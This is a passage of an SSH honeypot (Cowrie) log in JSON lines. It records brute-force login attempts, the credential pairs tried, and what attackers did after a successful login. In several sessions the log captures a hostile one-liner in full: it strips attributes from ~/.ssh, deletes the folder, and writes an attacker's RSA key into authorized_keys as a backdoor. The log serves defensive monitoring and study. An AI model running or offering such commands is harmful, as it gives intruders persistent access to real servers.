AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:06:17.957826Z","src_ip":"212.227.235.229","session":"c1d93ab9b34a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:06:18.205049Z","src_ip":"212.227.235.229","session":"c1d93ab9b34a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:06:18.205945Z","src_ip":"212.227.235.229","session":"c1d93ab9b34a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39594,"dst_ip":"1.2.3.4","dst_port":22,"session":"6603debf3577","protocol":"ssh","message":"New connection: 212.227.235.229:39594 (1.2.3.4:22) [session: 6603debf3577]","sensor":"my-vps","timestamp":"2025-08-26T13:06:18.447186Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:06:18.448080Z","src_ip":"212.227.235.229","session":"6603debf3577"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:06:18.691448Z","src_ip":"212.227.235.229","session":"6603debf3577"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:06:19.710580Z","src_ip":"212.227.235.229","session":"6603debf3577"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:06:20.955906Z","src_ip":"212.227.235.229","session":"6603debf3577"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:06:20.964298Z","src_ip":"212.227.235.229","session":"470ecf62296e"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:06:20.965953Z","src_ip":"212.227.235.229","session":"470ecf62296e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41616,"dst_ip":"1.2.3.4","dst_port":22,"session":"6876e30ea6b9","protocol":"ssh","message":"New connection: 212.227.235.229:41616 (1.2.3.4:22) [session: 6876e30ea6b9]","sensor":"my-vps","timestamp":"2025-08-26T13:06:21.199535Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:06:21.200434Z","src_ip":"212.227.235.229","session":"6876e30ea6b9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:06:21.441388Z","src_ip":"212.227.235.229","session":"6876e30ea6b9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:06:22.405576Z","src_ip":"212.227.235.229","session":"6876e30ea6b9"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:06:22.648290Z","src_ip":"212.227.235.229","session":"6876e30ea6b9"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:06:22.652181Z","src_ip":"212.227.235.229","session":"c1d93ab9b34a"}
{"eventid":"cowrie.session.connect","src_ip":"94.182.136.108","src_port":6292,"dst_ip":"1.2.3.4","dst_port":22,"session":"63739a604ca2","protocol":"ssh","message":"New connection: 94.182.136.108:6292 (1.2.3.4:22) [session: 63739a604ca2]","sensor":"my-vps","timestamp":"2025-08-26T13:07:01.353488Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:07:01.354788Z","src_ip":"94.182.136.108","session":"63739a604ca2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:07:01.454563Z","src_ip":"94.182.136.108","session":"63739a604ca2"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ss1234","message":"login attempt [root/p@ss1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:07:01.891498Z","src_ip":"94.182.136.108","session":"63739a604ca2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:07:02.171649Z","src_ip":"94.182.136.108","session":"63739a604ca2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:07:02.172314Z","src_ip":"94.182.136.108","session":"63739a604ca2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:07:02.173474Z","src_ip":"94.182.136.108","session":"63739a604ca2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:07:02.274084Z","src_ip":"94.182.136.108","session":"63739a604ca2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:07:02.495201Z","src_ip":"94.182.136.108","session":"63739a604ca2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:07:02.496209Z","src_ip":"94.182.136.108","session":"63739a604ca2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:07:02.598493Z","src_ip":"94.182.136.108","session":"63739a604ca2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:07:02.599708Z","src_ip":"94.182.136.108","session":"63739a604ca2"}
{"eventid":"cowrie.session.connect","src_ip":"94.182.136.108","src_port":6308,"dst_ip":"1.2.3.4","dst_port":22,"session":"76ecab8a9035","protocol":"ssh","message":"New connection: 94.182.136.108:6308 (1.2.3.4:22) [session: 76ecab8a9035]","sensor":"my-vps","timestamp":"2025-08-26T13:07:02.680795Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:07:02.681445Z","src_ip":"94.182.136.108","session":"76ecab8a9035"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:07:02.772664Z","src_ip":"94.182.136.108","session":"76ecab8a9035"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:07:02.895617Z","src_ip":"212.227.235.229","session":"80f9f72bf8af"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:07:03.179800Z","src_ip":"94.182.136.108","session":"76ecab8a9035"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:07:04.273826Z","src_ip":"94.182.136.108","session":"76ecab8a9035"}
{"eventid":"cowrie.session.connect","src_ip":"94.182.136.108","src_port":6314,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4598088bd76","protocol":"ssh","message":"New connection: 94.182.136.108:6314 (1.2.3.4:22) [session: b4598088bd76]","sensor":"my-vps","timestamp":"2025-08-26T13:07:04.374058Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:07:04.375078Z","src_ip":"94.182.136.108","session":"b4598088bd76"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:07:04.471435Z","src_ip":"94.182.136.108","session":"b4598088bd76"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:07:04.898799Z","src_ip":"94.182.136.108","session":"b4598088bd76"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:07:04.997003Z","src_ip":"94.182.136.108","session":"b4598088bd76"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:07:04.999066Z","src_ip":"94.182.136.108","session":"63739a604ca2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:07:17.703561Z","src_ip":"212.227.235.229","session":"3e237b1eabc4"}
{"eventid":"cowrie.session.closed","duration":180.22491931915283,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:07:17.710491Z","src_ip":"212.227.235.229","session":"3e237b1eabc4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59484,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2ce15727683","protocol":"ssh","message":"New connection: 212.227.235.229:59484 (1.2.3.4:22) [session: a2ce15727683]","sensor":"my-vps","timestamp":"2025-08-26T13:07:27.329891Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:07:27.331028Z","src_ip":"212.227.235.229","session":"a2ce15727683"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:07:27.571497Z","src_ip":"212.227.235.229","session":"a2ce15727683"}
{"eventid":"cowrie.login.failed","username":"steam","password":"test123","message":"login attempt [steam/test123] failed","sensor":"my-vps","timestamp":"2025-08-26T13:07:28.576508Z","src_ip":"212.227.235.229","session":"a2ce15727683"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:07:29.820017Z","src_ip":"212.227.235.229","session":"a2ce15727683"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56022,"dst_ip":"1.2.3.4","dst_port":22,"session":"61d2240b8b49","protocol":"ssh","message":"New connection: 212.227.235.229:56022 (1.2.3.4:22) [session: 61d2240b8b49]","sensor":"my-vps","timestamp":"2025-08-26T13:07:37.077847Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:07:37.079599Z","src_ip":"212.227.235.229","session":"61d2240b8b49"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:07:37.330847Z","src_ip":"212.227.235.229","session":"61d2240b8b49"}
{"eventid":"cowrie.login.success","username":"root","password":"Welcome2025!","message":"login attempt [root/Welcome2025!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:07:38.375890Z","src_ip":"212.227.235.229","session":"61d2240b8b49"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:07:38.928247Z","src_ip":"212.227.235.229","session":"61d2240b8b49"}
